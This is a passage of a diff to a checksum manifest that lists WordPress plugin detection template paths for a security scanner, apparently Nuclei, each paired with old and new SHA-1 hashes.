-http/technologies/wordpress/plugins/formidable.yaml:fc76ea970f27659d0479ccde36ffea594b78ece7 -http/technologies/wordpress/plugins/forminator.yaml:0d0c8abfd5d9b766e1d1f9ea24639096df336219 -http/technologies/wordpress/plugins/ga-google-analytics.yaml:06ed726b8d2b53d84fb0a0b1a5e7bee8ce776739 -http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml:eabba7c66e27662066cddd955ed9548285a0a19b -http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml:b80b8b453286fb2052562066564133d1df4d4522 -http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml:52e327176ffa0934107760389a7fa6c15d6cd736 -http/technologies/wordpress/plugins/google-listings-and-ads.yaml:98982c9edf9970367b127390e0c459c8b542e7fa -http/technologies/wordpress/plugins/google-site-kit.yaml:61300b4bd7867c298807e347709d0f2084201aa6 -http/technologies/wordpress/plugins/google-sitemap-generator.yaml:38b0d8740502247c857db2223f0d1a3bf68881b1 -http/technologies/wordpress/plugins/gtranslate.yaml:f2c1f59a6c40d7979e51aa224166e4fdae6d61d6 -http/technologies/wordpress/plugins/gutenberg.yaml:b87560081e190486ebe86901eabd5efecc742a51 -http/technologies/wordpress/plugins/happy-elementor-addons.yaml:7403aa1e1055a924ed8a53be33eb00c623f83442 +http/technologies/wordpress/plugins/easy-table-of-contents.yaml:267a33d9096f89f7bcc248165fafe9d2204e9332 +http/technologies/wordpress/plugins/easy-wp-smtp.yaml:161ee32490462f86d73b213326d7a79e0d118591 +http/technologies/wordpress/plugins/elementor.yaml:652496207b45a967c17a4ec3e5996d8e7af18587 +http/technologies/wordpress/plugins/elementskit-lite.yaml:9c823bd70666eaf3faa4d6a2a341fd48484aae9c +http/technologies/wordpress/plugins/enable-media-replace.yaml:204d371573e5b999054dc43bffc62e7a9788380b +http/technologies/wordpress/plugins/envato-elements.yaml:cff531cd20a179c4466e2ce14bb57f9c21779de6 +http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml:bbedc6e817c56fc23822e50d16222eb32c254e76 +http/technologies/wordpress/plugins/ewww-image-optimizer.yaml:5111b3bd1b406cef75eb55f6d94b7ffb1ab8c438 +http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml:e398ef126d184fc6fcd55b0ae7505d07256f5cbd +http/technologies/wordpress/plugins/fast-indexing-api.yaml:24c053160b15f31e0e39c72062b5fe52ba3628cc +http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml:77ec8fe554120cbb14a16c740ee1e305daf1de5c +http/technologies/wordpress/plugins/flamingo.yaml:e3174104a844d3c585d02eb19a9d0897f2183a0f +http/technologies/wordpress/plugins/fluentform.yaml:d1943c233c3e50d2fdb1389fab2f24debaef34fa +http/technologies/wordpress/plugins/font-awesome.yaml:280ee879887432c096e74713274e7c8dd49a8ddc +http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml:6e225c4cbe53d2e7aafbbf26b2930d91d9c227cf +http/technologies/wordpress/plugins/formidable.yaml:c274565610f6bb2e51f62609a9eb9f1c745d216a +http/technologies/wordpress/plugins/forminator.yaml:6672cff6385fefc1c8955e4d06063523b4f714ef +http/technologies/wordpress/plugins/ga-google-analytics.yaml:caa6d39075d8845063597b94571b79f53ab63673 +http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml:b50229bb43170beb1599514e8f7f5a7f02f74491 +http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml:ec9b3c5ced0c4d3536759524523c4c3c88420655 +http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml:a715de0a6fb8052a07376e2a9cb4ac5126bf59c2 +http/technologies/wordpress/plugins/google-listings-and-ads.yaml:360dd6cf302a3cce49a15ec0dde52c14971c4f62 +http/technologies/wordpress/plugins/google-site-kit.yaml:a6a65409f6341101e9a4b60577161f009d93765c +http/technologies/wordpress/plugins/google-sitemap-generator.yaml:2b3ada3b9410fdad52c8f5b4ae150b6fc53b3892 +http/technologies/wordpress/plugins/gtranslate.yaml:c1d1cbddcc65636be72fad5d4b7e43638c99b1bb +http/technologies/wordpress/plugins/gutenberg.yaml:9befbe85a39cae51c5b4c64bdc45408c58bdfc3e +http/technologies/wordpress/plugins/happy-elementor-addons.yaml:a7982134889e1f053a5b070cf2aa05391922f3df http/technologies/wordpress/plugins/header-and-footer-scripts.yaml:1d20308687bcbd54bf13c6f4ed88aa5d5707b8e4 -http/technologies/wordpress/plugins/header-footer-code-manager.yaml:a4d739ab05a15c526bd7196e0c28108397f46798 -http/technologies/wordpress/plugins/header-footer-elementor.yaml:0f4e464758736202d4cd5f630e3d6ae78183e63d -http/technologies/wordpress/plugins/header-footer.yaml:92936c6a47ff4726b0a7b97c7ea5686b5a8798cf -http/technologies/wordpress/plugins/health-check.yaml:fcf0c9e7e685f9de5b96cf415282e7985bce1918 -http/technologies/wordpress/plugins/hello-dolly.yaml:ca7e60c9eba41d32c0aa040cec2124ee6d9ecae5 -http/technologies/wordpress/plugins/host-webfonts-local.yaml:a2d3e90e76e99a6926515627ccfe2ba73c09bbe3 -http/technologies/wordpress/plugins/hostinger.yaml:3d1716bd2f46fb046fc487e581e644b972a5f161 -http/technologies/wordpress/plugins/image-optimization.yaml:12b0b8d10e65946e41142eb6a461eb801e925582 -http/technologies/wordpress/plugins/imagify.yaml:f085609c741c54a4bf3511d7bae996cc0d4eecff -http/technologies/wordpress/plugins/imsanity.yaml:913e20f768ce7b09c354531f4cf2bbc7db53093b -http/technologies/wordpress/plugins/insert-headers-and-footers.yaml:a36556103402d111ca593a49569521b6bc78a2e5 -http/technologies/wordpress/plugins/instagram-feed.yaml:93fb81f5e22e139fd2c0508740d52e896cf210c1 -http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml:a1363e721f2fe4ce39a3b05309da0f7c5addb465 -http/technologies/wordpress/plugins/iwp-client.yaml:b435ab5520345df3f78f16697923cb8b5e529692 -http/technologies/wordpress/plugins/jetpack-boost.yaml:7ada0ba0e1402f61160f703940af568bbdc5a78f -http/technologies/wordpress/plugins/jetpack.yaml:052e8123fe19a4ccbd88d7057b6220fc09bc49e5 -http/technologies/wordpress/plugins/kadence-blocks.yaml:462e77eee6dac513bd70e0d905c0430be341fc9a -http/technologies/wordpress/plugins/kirki.yaml:ee663466849a6e4a36b2e70523857761de9e4edc -http/technologies/wordpress/plugins/leadin.yaml:23f08928d76eb48d37b1fd9bbc17c729d533ebfb -http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml:a7f5642dee515d041e6f09dcd42eead3aed66ba7 -http/technologies/wordpress/plugins/limit-login-attempts.yaml:3f9d5d7dc7e5ceee331b6ae8a8a280dd4937064c -http/technologies/wordpress/plugins/litespeed-cache.yaml:5be7ee817bf0054050bfd6590f987f5e6020acb9 -http/technologies/wordpress/plugins/loco-translate.yaml:3566c32068b67384b7867192b410b9af6fd8f958 -http/technologies/wordpress/plugins/loginizer.yaml:df5aaf6c0fc123cdf155860b02497d948055b5ab +http/technologies/wordpress/plugins/header-footer-code-manager.yaml:289e264cb77a0e49f4d2a8b9eac34894587133ff +http/technologies/wordpress/plugins/header-footer-elementor.yaml:ff01e799b6be6d3a35a634ddb59dc3feeb74971d +http/technologies/wordpress/plugins/header-footer.yaml:f5cb8aac90544afa7f040a90a8d67eb89956483a +http/technologies/wordpress/plugins/health-check.yaml:f13d4b70061eb83da513a41bcac5b663e00a726d +http/technologies/wordpress/plugins/hello-dolly.yaml:e485af168399f371a4d58926eb2a061672c1ade6 +http/technologies/wordpress/plugins/host-webfonts-local.yaml:3de338710c82dfefda14e15ddbee3382bd4a2695 +http/technologies/wordpress/plugins/hostinger.yaml:c258384a825ac6eac2c8ae92dfafc04f9aa7b5b7 +http/technologies/wordpress/plugins/image-optimization.yaml:5f07b51b6b7b535553e91ca5aa4d6d866e6576b4 +http/technologies/wordpress/plugins/imagify.yaml:4fc9ea92ab697691dab04b140a42f77963aac090 +http/technologies/wordpress/plugins/imsanity.yaml:1d1576dbd89ac7eb753aca48558b6a6006476017 +http/technologies/wordpress/plugins/insert-headers-and-footers.yaml:daa72245e44981687b2cc3aba29ffcd5f23c1096 +http/technologies/wordpress/plugins/instagram-feed.yaml:458c169a77bc4135bc4d257f83ca76433337e51b +http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml:f52cd9238c91af09d3baa234f3a191a4d9e5a774 +http/technologies/wordpress/plugins/iwp-client.yaml:ce25c25a31a7187cfd8879d1fd44ad8d1c374a63 +http/technologies/wordpress/plugins/jetpack-boost.yaml:91e88e709207c0f1ab4afa8d1bf81f4c4ff077f8 +http/technologies/wordpress/plugins/jetpack.yaml:591f1d72e7a5ff761c8874675eb732e94b51176f +http/technologies/wordpress/plugins/kadence-blocks.yaml:72ad43816aac9f07ba34b8908a8d73524efe0429 +http/technologies/wordpress/plugins/kirki.yaml:7570d1f6135e7e63c7ec3aa53593abf4047bf6d6 +http/technologies/wordpress/plugins/leadin.yaml:affd8d2a63d30a0259beb93e4db946027fa1a405 +http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml:1fd5d5af02c6219c377541f46a6722a9f5949522 +http/technologies/wordpress/plugins/limit-login-attempts.yaml:2c87423132dd97ad7372016decdd8853f266c0f7 +http/technologies/wordpress/plugins/litespeed-cache.yaml:6689a39af5dc7ec18da249c482f464a3d48271b4 +http/technologies/wordpress/plugins/loco-translate.yaml:77b1299345d00406b42d3d6932b42cde23f5e221 +http/technologies/wordpress/plugins/loginizer.yaml:e5a34f2cdc1f0fc78d85074c1a3dbb00b0ba6b6c http/technologies/wordpress/plugins/loginpress.yaml:f3214f698e4519506749dc1c78c6c6f592d55cd7 -http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml:772f0c28175630aec6a63eb504d2ea1b74a25dd2 -http/technologies/wordpress/plugins/mailchimp-for-wp.yaml:1c05f90eb50f3a8f072925cd0303e84b199e41ec -http/technologies/wordpress/plugins/mailpoet.yaml:76728bbd00bb646eec55a8a5e6c469a30a718300 -http/technologies/wordpress/plugins/maintenance.yaml:44bd53f11dedde34fbc81dd58604744f1d183223 -http/technologies/wordpress/plugins/mainwp-child.yaml:fbf0ec1689a90f783c8ceb02f7a04382c39309e5 -http/technologies/wordpress/plugins/malcare-security.yaml:5f2ef05bae54a6a05dba95fac2c45753422d9185 -http/technologies/wordpress/plugins/megamenu.yaml:3a3867b2e7000490acec8a1db0f7765ed9fc8fe1 -http/technologies/wordpress/plugins/members.yaml:ba857dc41e1d31243de30015c4d9470d42df8c53 -http/technologies/wordpress/plugins/meta-box.yaml:285b1f97492cb199c5f4b4bcc5a6dd7ec2c24211 -http/technologies/wordpress/plugins/metform.yaml:90f52dbae57fb96e16c98281f8524d0daf351e9e -http/technologies/wordpress/plugins/ml-slider.yaml:7ed06a67a393d9bf9c1354a894fa26bca17fd4a2 -http/technologies/wordpress/plugins/newsletter.yaml:3ee3c651239599cb45dcf220c7409494c9ebe9c3 -http/technologies/wordpress/plugins/nextend-facebook-connect.yaml:0c33021a4eefb6a660c593071371537361dfb84d -http/technologies/wordpress/plugins/nextgen-gallery.yaml:ea5e79cd98b84b48b69a0145227d4ec435ed5392 -http/technologies/wordpress/plugins/ninja-forms.yaml:eaafa820796d0c404ee59dd9efefab26c58c4624 -http/technologies/wordpress/plugins/ocean-extra.yaml:65228be6752d1dc95c05dd0a4c75209b04a41790 -http/technologies/wordpress/plugins/official-facebook-pixel.yaml:42b1aeba39e9d1062b8b35b5d6fc1c9ac92914f0 -http/technologies/wordpress/plugins/one-click-demo-import.yaml:9b10160492a86d235ec330579fdefa5eb92b1a95 -http/technologies/wordpress/plugins/optinmonster.yaml:cb72b324f850b87de1beac0dce1f120bd5e89a47 -http/technologies/wordpress/plugins/otter-blocks.yaml:1d77ec76194db956e207c4671a626de6fb1b20e7 -http/technologies/wordpress/plugins/password-protected.yaml:691f351480bb6cd23aa7afedf5dcde3862b61154 -http/technologies/wordpress/plugins/pdf-embedder.yaml:93ec0b4ddeff00afbd2b34a4e49371ceb2d4c48d +http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml:b87e056e7d92c1f54d889e60f8df239e7c34a972 +http/technologies/wordpress/plugins/mailchimp-for-wp.yaml:16c00d7f106cecb9ff26aad082287ddf6bc36459 +http/technologies/wordpress/plugins/mailpoet.yaml:f533c59822a849ac5a72167ef4b444d422e89c04 +http/technologies/wordpress/plugins/maintenance.yaml:4b79af954e045c137990aea4b3b6588757cf809d +http/technologies/wordpress/plugins/mainwp-child.yaml:1c93ea665f3fde932eabafe3dea6de8623623f65 +http/technologies/wordpress/plugins/malcare-security.yaml:cb74929d0fbf455a3e358916ca27140d8130c77e +http/technologies/wordpress/plugins/megamenu.yaml:309a43933e21f230b33b617e2fe01d70059e7483 +http/technologies/wordpress/plugins/members.yaml:f3dd3c4a4a4795ef2fb44f585dfa87dffa601080 +http/technologies/wordpress/plugins/meta-box.yaml:bc282759bd18bd2d965cd05084ea0f3592ed0a1c +http/technologies/wordpress/plugins/metform.yaml:bedf2575208a0541a7a922a682bf49fedafda844 +http/technologies/wordpress/plugins/ml-slider.yaml:30d8c14fc93a1f17f8b37228661ef1d73078c8ad +http/technologies/wordpress/plugins/newsletter.yaml:905cd6bb49ae970d72eb6779acd5c7e9f739d55c +http/technologies/wordpress/plugins/nextend-facebook-connect.yaml:941bc4efdc298abfefd1494c6f8737c1a848cffd +http/technologies/wordpress/plugins/nextgen-gallery.yaml:92516bac6ca88ef6101e2551dc61b21f27434318 +http/technologies/wordpress/plugins/ninja-forms.yaml:88dbf5de06535618617b26353295eba46812f757 +http/technologies/wordpress/plugins/ocean-extra.yaml:be61ee0c5d97abfd66488eefd8c2b7963264b8cd +http/technologies/wordpress/plugins/official-facebook-pixel.yaml:4418cf2d93f4424c15c70e7a0da0adb3681d94ed +http/technologies/wordpress/plugins/one-click-demo-import.yaml:5e091e30a1c71bdc274089d9cc0ed503e6185d6e +http/technologies/wordpress/plugins/optinmonster.yaml:4ad8cb07518571f36f7dc6c515e3f3d59491c06a +http/technologies/wordpress/plugins/otter-blocks.yaml:89a7de85a503ff04a2908daa2981cbd0ce7c42d2 +http/technologies/wordpress/plugins/password-protected.yaml:f00046786f142c198b62d644865c27cf3dc8809b +http/technologies/wordpress/plugins/pdf-embedder.yaml:5cf27e388bdb2aaa8fe84a83c4a35720b8749ac8 http/technologies/wordpress/plugins/photo-gallery.yaml:37274dfdbd25ec4bcb7a3f79052c88d9df2c023e http/technologies/wordpress/plugins/php-compatibility-checker.yaml:9ae2457c7e9d21bee89ff0283903047bd188b93d -http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml:ea3fc197949183230c36a54ec40ce7cec2ce05cb -http/technologies/wordpress/plugins/pixelyoursite.yaml:b5bbf81e5eb650342b3d4c2fca46310ee8801848 -http/technologies/wordpress/plugins/polylang.yaml:366f25da7da9f9f2f6aa349b25c24d9242b86c1a +http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml:b326e2e1c1de75608f7ee28281d3f703fd1e73a9 +http/technologies/wordpress/plugins/pixelyoursite.yaml:a93bc9913476e3325944f90a20438077d21ce57a +http/technologies/wordpress/plugins/polylang.yaml:e79cccf738ce7a25e6145c9571b9161bfe877ae3 http/technologies/wordpress/plugins/popup-builder.yaml:468087ab250c0b356f499a501d5a948d709c9a05 -http/technologies/wordpress/plugins/popup-maker.yaml:1c4cfb8a42e30c98281bc9a2f5c966d999c2a7d7 -http/technologies/wordpress/plugins/post-smtp.yaml:5146be93263e512b200ab784727f91612d5117f6 -http/technologies/wordpress/plugins/post-types-order.yaml:3691aaa9f183d9feef18ec4b069b169a96871b81 -http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml:5eac1e84dd2eb1f27121ee409e9e4c6f69ed588c -http/technologies/wordpress/plugins/pretty-link.yaml:9babdd01d2c338a5f22e1e684a3d2a6b82424668 -http/technologies/wordpress/plugins/really-simple-captcha.yaml:f76181edda9b3d62e3ea21bd51a4d5e4c450bef6 -http/technologies/wordpress/plugins/really-simple-ssl.yaml:bb7296600fad043c5a5fa3ea8c4d3de597e133bc -http/technologies/wordpress/plugins/redirection.yaml:f2fc65063eeb5b4f425e53c33e752b0acc46e8f1 -http/technologies/wordpress/plugins/redux-framework.yaml:af9b75a984712e6609f6bd94f956e026b9dc307b -http/technologies/wordpress/plugins/regenerate-thumbnails.yaml:c0fa1d1aece59d5d6e8e708f4b2d49e769998dd9 -http/technologies/wordpress/plugins/royal-elementor-addons.yaml:81ee3491d2caa18b8f476cbc4f8bdf6645f98857 -http/technologies/wordpress/plugins/safe-svg.yaml:7593c611e1da50fc587d7a34a6447f494d5cddb8 -http/technologies/wordpress/plugins/seo-by-rank-math.yaml:91918b715b41c561ccd6da01b15c5710ceefd48d -http/technologies/wordpress/plugins/sg-cachepress.yaml:86a47e535c821c5c1af37c73687729982a7e8256 -http/technologies/wordpress/plugins/sg-security.yaml:e833734b1006bc06ee6c86a825b3902ec67fb113 -http/technologies/wordpress/plugins/shortcodes-ultimate.yaml:55d132c332394a78efb0b3130261bf37cc0612d2 -http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml:196c39da6c914816c14f11df5fc9106d9439f200 -http/technologies/wordpress/plugins/simple-custom-post-order.yaml:f7959e70ca5912ffccbe8bfb5aaf69f15dea94ad -http/technologies/wordpress/plugins/simple-history.yaml:2159d42f27309f1f6a116a76e883b46ef1087ce9 +http/technologies/wordpress/plugins/popup-maker.yaml:d30d8653f4bbee111ab91fafaac1db577b4dd3d7 +http/technologies/wordpress/plugins/post-smtp.yaml:a3578c503491eb2ad2738f10e51b7f537c135ea8 +http/technologies/wordpress/plugins/post-types-order.yaml:920b274a5917f67823d80ffdaf48ac100765e204 +http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml:fcab4216ea4da62dc4aab773ffa610bfef0a23d6 +http/technologies/wordpress/plugins/pretty-link.yaml:1edcb37d35b7d5f1b6cb6912efc6abb99c074a57 +http/technologies/wordpress/plugins/really-simple-captcha.yaml:22a2de65aeea94c40440ede29f72921d6076c4de +http/technologies/wordpress/plugins/really-simple-ssl.yaml:41ae12b8da426e732ded14a5d3a388063e5f50a5 +http/technologies/wordpress/plugins/redirection.yaml:b620b614968112e6b40b48ebccf5f84810d18181 +http/technologies/wordpress/plugins/redux-framework.yaml:4672eb789e48ed474952bb40347c3eb98952c976 +http/technologies/wordpress/plugins/regenerate-thumbnails.yaml:ec6625a0827890109cd95016413c2db10c0760fb +http/technologies/wordpress/plugins/royal-elementor-addons.yaml:717d343cb8da3b7d9777cffa8c4354c3d3c3df27 +http/technologies/wordpress/plugins/safe-svg.yaml:c74fe18757ccf1d53328727b3d68888646a8edee +http/technologies/wordpress/plugins/seo-by-rank-math.yaml:cde51ef6410f93bc7f6aeb88c46f8d4444d459eb +http/technologies/wordpress/plugins/sg-cachepress.yaml:4996a5b1393f47f45dcb4ea17ca83fd2f02612f8 +http/technologies/wordpress/plugins/sg-security.yaml:c8f64310ffb44afac15a1c595aabfba7d49d0514 +http/technologies/wordpress/plugins/shortcodes-ultimate.yaml:974882c1a8f7fd492c30f99c5ac89a50ef11e0bc +http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml:30c15b0afcb960610f8c55c400f97f1d0aecd8b7 +http/technologies/wordpress/plugins/simple-custom-post-order.yaml:bc6f0b1037080fac949f1828f5ffcffe34f85015 +http/technologies/wordpress/plugins/simple-history.yaml:260b21ae07205e9f1d003bb5066f55094b4246a0 http/technologies/wordpress/plugins/simple-page-ordering.yaml:7d96ac56d7ed2ed031b6789429888ef703d39538 -http/technologies/wordpress/plugins/siteguard.yaml:1603622bb764bbd891fa245b1fb0851d8443eec0 -http/technologies/wordpress/plugins/siteorigin-panels.yaml:bdd37fdd569c13441fb87d5a310a8beca53ecead -http/technologies/wordpress/plugins/smart-slider-3.yaml:6669412fae6e1f830d8132df4b3ad7036fa95746 -http/technologies/wordpress/plugins/so-widgets-bundle.yaml:9e123d8b5122703a197a8279f6b6612af707aa1f +http/technologies/wordpress/plugins/siteguard.yaml:1ab0b514d7bb105b9c930a064d97b9f4d5e661a2 +http/technologies/wordpress/plugins/siteorigin-panels.yaml:48ceea2a4d8f66074708aa72ab98d5ca85cb9cdd +http/technologies/wordpress/plugins/smart-slider-3.yaml:8311d7fcd57a1cc6c8499ec2ed0ad7992600b922 +http/technologies/wordpress/plugins/so-widgets-bundle.yaml:65bcba03172995a80d42374217c157d482f5bf73 http/technologies/wordpress/plugins/ssl-insecure-content-fixer.yaml:aab70fa0f4b1c898371aa4af959db60e6cc733dd -http/technologies/wordpress/plugins/sticky-header-effects-for-elementor.yaml:218b764f5e7ec74be15c072c6dcef4976de6d79b -http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml:48e485435630e99bcc197171a946575b47361c73 -http/technologies/wordpress/plugins/sucuri-scanner.yaml:73a5d57f8a22ede9c4de7d3fba4f1aeaa4c4bb2e -http/technologies/wordpress/plugins/svg-support.yaml:9e209af3c91abf6ba27d6d2b49ddf7196dc91450 -http/technologies/wordpress/plugins/table-of-contents-plus.yaml:e9ca166f376b599e787a66db6114262e2a888811 -http/technologies/wordpress/plugins/tablepress.yaml:1907c25a373a78ea4c81d21eae209acb12104a9b -http/technologies/wordpress/plugins/taxonomy-terms-order.yaml:a8ac16c00a1fe225e48ebe24c94aba1323e1e584 -http/technologies/wordpress/plugins/templately.yaml:2b4d2d3c2706a8736bd848f882e18bb587689859 -http/technologies/wordpress/plugins/the-events-calendar.yaml:52c6ff41c4bd34154268728639cfa0e3b4f8d8ab +http/technologies/wordpress/plugins/sticky-header-effects-for-elementor.yaml:f0b383dd9c2c91f0ab96afeb8cd35e9776382b92 +http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml:700b0432c4c879e4244466c4b7d8c5fc379c90e6 +http/technologies/wordpress/plugins/sucuri-scanner.yaml:b501cc814abf7c62ebcd572c9c5cd3d9b92a4a47 +http/technologies/wordpress/plugins/svg-support.yaml:998a535bd37f4155dd0365af0e4753e29788b9bc +http/technologies/wordpress/plugins/table-of-contents-plus.yaml:5376c2999a1e2429ded96a612b1126aeb8262cce +http/technologies/wordpress/plugins/tablepress.yaml:4285d90f3e8b57f34ff2262bd49b0d10ae96419a +http/technologies/wordpress/plugins/taxonomy-terms-order.yaml:4b4432f06be68d6cc258b364acf2fa407f0abeb9 +http/technologies/wordpress/plugins/templately.yaml:5269940e53a3a2301435b0e563ce28e30b264c40 +http/technologies/wordpress/plugins/the-events-calendar.yaml:133bce5bd4d26e707e77665d6173360556a57a38 http/technologies/wordpress/plugins/themeisle-companion.yaml:c706aef04e5b9ce414f460819eca30bb3bcb00e5 -http/technologies/wordpress/plugins/tinymce-advanced.yaml:9e6bb4ae3c2a1718e019e5374810c6b9e64fa3f5 -http/technologies/wordpress/plugins/translatepress-multilingual.yaml:97b7e9a9b4b15aff49cca7d5e725392e7bf627fd -http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml:9c37c0d9262b2938015364f494651b05b0fa6033 -http/technologies/wordpress/plugins/under-construction-page.yaml:c76e58a7cf7365aaaa3685531874f5d2ea3d1b68 +http/technologies/wordpress/plugins/tinymce-advanced.yaml:34e5ffdca193b73314a71133e56591e04cea33f6 +http/technologies/wordpress/plugins/translatepress-multilingual.yaml:7dc0fe6eac1d8e7740657db13ac6bb785378486c +http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml:07a7da513a29c0f9aecf934257f9c4f071db1771 +http/technologies/wordpress/plugins/under-construction-page.yaml:6d08ac4d471dad846b03efe56f171aaf715f2a97 http/technologies/wordpress/plugins/unyson.yaml:e01d9f525f3cf577ab43441c694230c07608611e -http/technologies/wordpress/plugins/updraftplus.yaml:ca4d717fe515b7eb6536411561bb5541b05681fa +http/technologies/wordpress/plugins/updraftplus.yaml:045118935a004bea90d44b3b833a334f06b1095b http/technologies/wordpress/plugins/use-any-font.yaml:e1c358a86017c4c3f5abe62d76da6878d61f5d47 -http/technologies/wordpress/plugins/user-role-editor.yaml:65b055fb6332b2169a9e7143591f116c146e06a8 +http/technologies/wordpress/plugins/user-role-editor.yaml:3d242a4f76f54640f4c031c97039e912b72ba2e4 http/technologies/wordpress/plugins/velvet-blues-update-urls.yaml:1a6d9e7560dba5c9471c20cffdf0ba1b098fbb7c -http/technologies/wordpress/plugins/w3-total-cache.yaml:e6d76a664a5009598ce3e2d6f3b412667c9cacef -http/technologies/wordpress/plugins/webp-converter-for-media.yaml:305690e415de547348ac36cf0d9544b347b16a38 -http/technologies/wordpress/plugins/webp-express.yaml:fcb956491146843be9f3b5f152965cc0796f75e8 -http/technologies/wordpress/plugins/widget-importer-exporter.yaml:ffa48fc0f80ceb41dff2b5c69116837b0111e074 -http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml:6db1302965c217cd38e160295fd9d7defa47afa9 -http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml:c2b6a592df83eb0b6abbfa988893633cb948b997 -http/technologies/wordpress/plugins/woo-variation-swatches.yaml:68f2dd5d2776de335efc273ddf2249b507527398 +http/technologies/wordpress/plugins/w3-total-cache.yaml:ee8cb7e2f424b0c65a698e5552d9c488e0517dd2 +http/technologies/wordpress/plugins/webp-converter-for-media.yaml:90bce6cd0d6af4d083ea621009898e3b30d0753d +http/technologies/wordpress/plugins/webp-express.yaml:3763d7cf7e42491ba98dc11ed35978c2b1c4fc24 +http/technologies/wordpress/plugins/widget-importer-exporter.yaml:b3ffee2831df339180a94f5df3f8795d173cb0dc +http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml:a4971f49a001ccd8745577089459c47fd6697dd1 +http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml:699019f4f047d5ab2778c7aa2364a594b0514a08 +http/technologies/wordpress/plugins/woo-variation-swatches.yaml:cb46a421f5ae77ecce2d230472849442a3cf27b6 http/technologies/wordpress/plugins/woocommerce-gateway-paypal-express-checkout.yaml:4f2c82ad5cf98659804bd115d05bf9db8461e200 -http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml:9929d037d9f1459cff16926d024bcf666c50edda -http/technologies/wordpress/plugins/woocommerce-legacy-rest-api.yaml:e7b3acf574cd1dc2b9d4f7a6240769a83a938856 -http/technologies/wordpress/plugins/woocommerce-payments.yaml:60a3ada3d5bd510f77eb3a77c32d88ad20e997bc -http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml:b2a01f711495d5a37d201b510a6487ae816dab9b -http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml:d3b1a70c5b241c5776101bdf5fb0ee9753725d4b -http/technologies/wordpress/plugins/woocommerce-services.yaml:6f9a1c3b761936c259c9e29ee32d28f691ae8b77 -http/technologies/wordpress/plugins/woocommerce.yaml:8231905d6d899f1da3fe5641cb3908eac4c1113f -http/technologies/wordpress/plugins/wordfence.yaml:43d1eb1e1e314aa16d9c1d5d0d5d4c59de91ac1b -http/technologies/wordpress/plugins/wordpress-importer.yaml:c7ba561f2a03d75e5f929c367ecdce158d4e456f -http/technologies/wordpress/plugins/wordpress-seo.yaml:a9de56a1598eaa8ab15ab968f734d71fdf2bc107 +http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml:c803551cc13cfd009286bf7788bac955bd52c274 +http/technologies/wordpress/plugins/woocommerce-legacy-rest-api.yaml:fd2463a8db5f3333e5e590c1d876368b286eee81 +http/technologies/wordpress/plugins/woocommerce-payments.yaml:f2412e568ff52fc6558fdd5aa576c63cbed6e868 +http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml:4953150be350d6abc9d923412c1dc6dbe67dd2fb +http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml:9525494692034df0cc23ead90b12f07072343153 +http/technologies/wordpress/plugins/woocommerce-services.yaml:321a322c5f93122eba099fb821074b18f5f22b99 +http/technologies/wordpress/plugins/woocommerce.yaml:c25c0eb6bc879c1914dc1937c65a15c5ca880214 +http/technologies/wordpress/plugins/wordfence.yaml:2adbf257cf6af57fef5d69c48464b94fc7889e6b +http/technologies/wordpress/plugins/wordpress-importer.yaml:89d8d39352453f41e8b7ae2b565e3e33756044de +http/technologies/wordpress/plugins/wordpress-seo.yaml:f66c734ee221f9d24281ac89434216d9d153dd3d http/technologies/wordpress/plugins/wordpress-woosidebars.yaml:679cd62c97446d90fc7fbb50f64403cb10c4c319 -http/technologies/wordpress/plugins/worker.yaml:eec5a16391040875785d932499c9f260e8efeb8c -http/technologies/wordpress/plugins/wp-fastest-cache.yaml:3bac8419d21ce83693d583293fb12b438a544402 -http/technologies/wordpress/plugins/wp-file-manager.yaml:227e50238a78872a0caf5ac0c54ab4d4fa33be67 -http/technologies/wordpress/plugins/wp-google-maps.yaml:f398fe5460d8180c0e85568b79baa92355130348 -http/technologies/wordpress/plugins/wp-mail-smtp.yaml:3c08f95f3bce5c44e7c5ebda373c397d0ddb8342 -http/technologies/wordpress/plugins/wp-maintenance-mode.yaml:d7bb63c19f2338fd77cfa210fc4fa2e2c8bbff85 -http/technologies/wordpress/plugins/wp-migrate-db.yaml:996eb41fddbc34f6078ebecc34cececbb6eec504 -http/technologies/wordpress/plugins/wp-multibyte-patch.yaml:252c64b3711943bbfd6d507669f1175f2225cbb2 -http/technologies/wordpress/plugins/wp-optimize.yaml:7d8bae34481b9723031a3574ce49620e76ad88ec -http/technologies/wordpress/plugins/wp-pagenavi.yaml:2a1f36db756a5f86740144301429285d3c50fee9 -http/technologies/wordpress/plugins/wp-reset.yaml:28019b1d96d3d4c456ac774c3e5cdeb666b06859 